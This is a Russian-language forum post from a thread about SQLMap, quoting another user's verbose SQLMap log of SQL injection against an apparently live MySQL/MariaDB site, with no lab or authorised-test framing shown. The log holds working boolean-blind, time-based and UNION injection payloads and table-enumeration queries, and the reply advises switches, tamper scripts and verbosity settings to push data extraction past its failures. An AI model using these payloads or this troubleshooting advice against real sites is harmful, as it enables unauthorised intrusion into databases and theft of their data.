Тема: Вопросы по SQLMap
Показать сообщение отдельно

  #10  
Старый 08.10.2021, 11:09
msk_smail
Познающий
Регистрация: 09.03.2016
Сообщений: 30
С нами: 5357846

Репутация: 0
По умолчанию
Цитата:
Сообщение от brown  

Код:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://' AND 7389=7389-- qoxM

    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
 more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found
Код:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
 
Ответить с цитированием